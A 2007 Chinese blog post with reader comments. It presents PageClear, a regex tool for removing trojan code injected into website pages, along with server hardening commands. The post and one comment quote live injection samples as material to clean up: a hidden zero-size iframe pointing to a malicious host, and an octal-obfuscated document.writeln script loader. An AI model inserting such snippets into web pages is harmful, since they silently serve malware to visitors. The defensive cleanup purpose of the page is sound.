针对网站被挂马对策以及清除工具PageClear 1.0

现在很流行的一种侵入方式是首先入侵WEB服务器，注入木马，然后以服务器为媒介，面对网站用户大量散发病毒，这种方式一般通过向网页尾部加入<iframe></iframe>标记来隐藏自己并实现向用户的分发,如下图所示:

要防止此类注入，首先要确保服务器安全性，一般ASP木马是通过Shell.Application、WScript.Shell、FSO、WScript.Network组件来实现其功能的，因此这几个组件必须禁止，执行下面的语句，即可做到初步防范。

regsvr32 /u c:\windows\system32\scrrun.dll cacls C:\WINNT\system32\shell32.dll /e /d guests regsvr32/u C:\WINNT\System32\wshom.ocx cacls C:\WINNT\system32\Cmd.exe /e /d guests

网站一旦被入侵，要清理是相当麻烦的，稍大点的网站动辄几百个页面，高级点的入侵甚至会采取一些随机代码来避开普通的替换工具。所以我写了一个清除工具PageClear,主要是清除网页木马，这是一个正则表达式替换器，因此也可以用作一些批量文本的匹配，替换工具。

使用说明：
1 选择要清理的目录，该工具可查找指定目录下（包括子目录）所有符合条件的文件。
2 指定匹配正则表达式，你可以直接复制木马代码，如“<iframe src=http://xxx.mmma.biz/ps.htm width=0 height=0></iframe>”。或使用正则来匹配各种样本。
3 替换表达式一般为空，也可以填写你想要替换的内容。
4 操作的文件类型：你要操作的文件扩展名，用|隔开，注意前面不要漏了"."符号。
5 测试文本：对你设定的正则表达式的测试。

建议指定正则表达式后将网页样本复制到测试文本框中进行测试，确认无误后点击“开始清理”，即可执行清理工作了。

本工具需要.net Framework 2.0支持，电脑装此框架的可以去微软网站下载：Microsoft .NET Framework 2.0 版可再发行组件包 (x86)

下载PageClear1.0 大小：36K

posted @ 2007-11-9 20:08:53 Leisang 阅读(2350) | 评论(29) | 编辑

Feedback

小兵 | 2007-11-17 14:59:10

真的，很好用哦

GOOD | 2008-1-11 19:38:26

请问已经下载了的完整网页能清除干净吗？已知某网站中的是HTML/TrojanDownloader.Agent.BP木马。几乎某一时段下载的网页都存在，虽然更新后下载的没有问题，但其风格已大变而且工作量太大。请问该如何清除木马使下载的旧网页得以安全保留？？盼求解！！

GOOD | 2008-1-11 19:38:28

Leisang | 2008-1-11 21:23:18

回Good：
你说的情况是可以用PageClear清除的，一般情况下只要复制病毒样本到软件中，即可查找并清除，如果病毒嵌入比较复杂，则需要写正则表达式。

mbreeze | 2008-1-31 22:50:12

我的服务器被插入以下 JS代码
document.writeln("\74\163\143\162\151\160\164\40\163\162\143\75\42\150\164\164\160\72\57\57\167\45\67\67\167\45\63\63\56\144\45\66\64\156\163\56\45\66\71\156\146\157\57\45\66\71\45\66\105\45\66\66\45\66\106\45\62\105\45\66\101\45\67\63\42\76\74\57\163\143\162\151\160\164\76");
这个怎么用你的表达式查呢,现在这个病毒很猖狂阿,我服务器所有.JS都感染了!

Leisang | 2008-2-1 15:27:03

回mbreeze：
正则表达式处填入：
document.writeln\("\\74\\163\\143[\s\S]+?\);
然后选择中毒的文件，即可清除。

Leisang | 2008-2-1 15:27:53

另外操作的文件类型处增加"|.js"扩展名。

whf13389825898@163.com | 2008-2-12 15:28:07

电脑运行不了，都有2.0

whf13389825898@163.com | 2008-2-12 15:32:28

在服务器2003运行不了

whf13389825898@163.com | 2008-2-12 15:32:39

在服务器2003运行不了

whf13389825898@163.com | 2008-2-12 15:36:41

可以嘞，要指定分区上的目录，指定分区就不行

wdjialen | 2008-2-16 16:33:46

你好
今天看到你的这个软件很好
我也用过不少的批量替换工具

想给你提几个建议
1，批量替换的时候判断一下大小写是否区分
2，是否完全匹配虽然有正则表达式可以使用但是对于普通用户来说正则表达式就可能写不出来
3，是否能按照修改日期来批量替换

我的msn wdjialen#hotmail.com

Leisang | 2008-2-18 14:03:52

@wdjialen
谢谢你的建议：）
1，批量替换的时候判断一下大小写是否区分
恩，这个很对

2，是否完全匹配虽然有正则表达式可以使用但是对于普通用户来说正则表达式就可能写不出来
这是我偷懒的做法：）。。。。
~~~~

紫晶莹 | 2008-3-4 11:29:09

谢谢你这软件，这软件太好了~！！
还有一个问题，就是conn.asp清理不了。。

Leisang | 2008-3-4 15:21:42

@紫晶莹

谢谢
conn.asp有特殊代码？

紫晶莹 | 2008-3-6 8:53:05

就是测试文本不知道怎么写，才能清理<%……%>

紫晶莹 | 2008-3-6 8:53:06

就是测试文本不知道怎么写，才能清理<%……%>

Leisang | 2008-3-6 21:55:21

@紫晶莹
你好，<%....%>可用下面的正则表达式：

<%([\s\S]+?)%>

止不住的晕 | 2008-3-24 16:17:07

非常感谢你提供的这个工具！
有一个问题，清除代码的时候，是将网站下回来清除完了再上传回去好呢？还是将此工具上传到服务器，在服务器上直接清除好？

Leisang | 2008-3-24 18:46:34

@止不住的晕

你好，2种方法都可以，你可以先把感染的页面代码放到测试框里，经过测试无误即可执行清除了。

宠坏虫儿 | 2008-5-10 23:48:24

赞一个~啵一个~

kwenboy | 2008-7-16 11:04:48

这个怎么写归则才能清理

kwenboy | 2008-7-16 11:08:41

就这个

Leisang | 2008-7-19 15:40:52

@kwenboy

bbs.vskycom.cn/1.jpg 这个？清除应该带前后缀吧？
请发详细的过来看看

123 | 2008-9-23 22:46:52

太好了,谢谢!

风筝 | 2008-11-3 21:40:10

怎么能不分大小写啊？我这个是随机的字母变化大小写，根本整不了！谢谢啊

lim | 2008-11-29 12:13:17

有空可以出一个新版本吗，区分一下大小写的
或者可以把源码放出来，让我们学习改进一下
谢谢！

昵称：
主页：
内容：	超链接图片 Flash 代码引用大小视频
验证码：

公告

文章分类

文章档案

最新评论